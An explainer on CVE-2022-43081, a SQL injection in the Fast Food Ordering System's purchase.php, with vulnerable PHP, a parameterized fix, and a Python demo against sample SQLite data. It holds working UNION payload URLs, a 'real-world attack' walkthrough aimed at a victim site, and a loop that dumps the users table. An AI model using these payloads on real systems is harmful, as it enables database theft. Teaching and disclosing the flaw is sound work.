When you’re hungry and order food online, you trust that the site is secure. But in 2022 a flaw, officially tracked as CVE-2022-43081, was disclosed in the Fast Food Ordering System v1.0. It lets an attacker run their own SQL against the site's database and read data they were never meant to see. Let’s break this down in plain English, show a code example, and explain how it works.

Vulnerability Type: SQL Injection

- Vulnerable File: /fastfood/purchase.php
- What Happens: An attacker can insert, or "inject", SQL into a request parameter that the page pastes straight into a database query. The database then executes the attacker's SQL along with the developer's, which can expose usernames, password hashes and order details or, depending on the database account's privileges, modify the site's data.

Where’s the Problem?

The vulnerable code is in purchase.php. The developer takes the id parameter from the request and concatenates it into the SQL string without validating, escaping, or binding it.

Imagine this (simplified PHP code, illustrating the pattern rather than the exact file):

<?php
include('db.php');
$id = $_GET['id'];                                   // untrusted, taken straight from the URL
$sql = "SELECT * FROM orders WHERE id='$id'";        // spliced into the query as-is
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);                  // only the first row is ever read
echo "Order: " . $row['order_name'];                 // ... and only one column is printed
?>

If an attacker visits

http://example.com/fastfood/purchase.php?id=1

That's normal. But what if they try

http://example.com/fastfood/purchase.php?id=1' OR '1'='1

The query becomes

SELECT * FROM orders WHERE id='1' OR '1'='1'

Now, instead of just order 1, the query matches ALL orders because '1'='1' is always true. Notice, though, that this page calls mysqli_fetch_assoc once and prints a single column, so the browser still shows only the first row. That is why a real attacker moves on to a UNION (below) or to blind techniques that infer data one true/false answer at a time.

Extracting User Data

Let’s suppose the database also has a users table. With a UNION-based injection, an attacker appends a second SELECT whose rows come back through the same page:

http://example.com/fastfood/purchase.php?id=-1' UNION SELECT 1,username,password FROM users-- -

*(Note: the exact string varies with the database structure. The injected SELECT must return the same number of columns as the orders table, the id is set to a value that matches no real order so the injected row is the first one the page prints, and the trailing -- - comments out the closing quote that purchase.php appends.)*

Here’s a step-by-step real-world attack

Step 1: Find a site running this software (the vulnerable path is /fastfood/purchase.php).

Step 2: Visit the vulnerable URL with a payload

http://victim-site.com/fastfood/purchase.php?id=-1' UNION SELECT 1,user(),database()-- -

If the injection works, the page prints, where an order name should be, the MySQL account the application connects with (user()) and the name of the current database (database()).

Step 3: If the page displays the injected results, the site is vulnerable, and the same technique can be pointed at any table the database account can read.

Why is This Serious?

- Data Theft: Attackers can read the whole database. Usernames, emails, order details, and maybe even passwords can be stolen.

Developers: Always use parameterized queries!

Bad:

$sql = "SELECT * FROM orders WHERE id='$id'";

Good

$stmt = $conn->prepare("SELECT * FROM orders WHERE id=?");   // the query shape is fixed before any data arrives
$stmt->bind_param("i", $id);                                  // bound as an integer; never parsed as SQL
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();                    // requires mysqlnd; otherwise use bind_result()
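To see the whole chain end to end, here is an added example (it is not code from this page or from the Fast Food Ordering System project) that reproduces the way purchase.php builds its query, in Python against an in-memory SQLite database with constructed sample rows. SQLite stands in for MySQL, which is fine here because the -- - comment and the LIMIT n,1 form behave the same way; the table columns, function names and data are assumptions. It shows the three behaviours discussed above: the tautology payload still yields only the first row because the page fetches one row; a UNION payload with a non-matching id and a LIMIT offset walks the users table one row per request; and the parameterized version treats the very same payloads as plain values and returns nothing.

```python
import sqlite3

# Constructed sample schema and data, standing in for the app's MySQL tables.
SCHEMA = """
CREATE TABLE orders (id INTEGER PRIMARY KEY, order_name TEXT, price REAL);
CREATE TABLE users  (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO orders VALUES (1, 'Cheeseburger', 5.99), (2, 'Fries', 2.49);
INSERT INTO users  VALUES (1, 'admin', 'admin123'), (2, 'bob', 'hunter2');
"""


def make_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, user_id):
    """Mirrors purchase.php: the raw GET value is spliced into the SQL text.
    Like mysqli_fetch_assoc() in the page, only the first row is returned."""
    sql = f"SELECT * FROM orders WHERE id='{user_id}'"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, user_id):
    """Parameterized form: the value is bound to ?, so quotes, OR, UNION and
    comment markers inside it are just characters in a string literal."""
    return conn.execute("SELECT * FROM orders WHERE id=?", (user_id,)).fetchone()


def dump_users_via_union(conn, max_rows=10):
    """Attacker-side loop. id=-1 matches no order, so the UNION row becomes the
    first (and only printed) row; LIMIT n,1 selects one users row per request."""
    found = []
    for n in range(max_rows):
        payload = f"-1' UNION SELECT 1,username,password FROM users LIMIT {n},1-- -"
        row = vulnerable_lookup(conn, payload)
        if row is None:          # ran past the last user
            break
        found.append((row[1], row[2]))   # lands in the order_name / price slots
    return found


if __name__ == "__main__":
    db = make_db()
    print("normal      :", vulnerable_lookup(db, "1"))
    print("tautology   :", vulnerable_lookup(db, "1' OR '1'='1"))   # still one row
    print("union dump  :", dump_users_via_union(db))
    print("bound, same payload:", safe_lookup(db, "-1' UNION SELECT 1,username,password FROM users-- -"))
```

The tautology line is the point practitioners often miss: it proves the injection exists, but on a page that prints one row it leaks nothing new. The UNION loop is what actually turns the bug into a data breach, and the final line shows that the hardened query returns no row for the identical input, because nothing the attacker typed is ever parsed as SQL.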

References

- NVD entry for CVE-2022-43081: https://nvd.nist.gov/vuln/detail/CVE-2022-43081
- GitHub PoC by @linlinlzx
- OWASP, SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection

Final Thoughts

Even simple mistakes, like concatenating user input into a query, can open the door to dangerous attacks. CVE-2022-43081 is a classic example. If you run Fast Food Ordering System v1.0, update or patch it fast, and until then treat the id parameter of purchase.php as hostile.

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/02/2022 00:36:00 UTC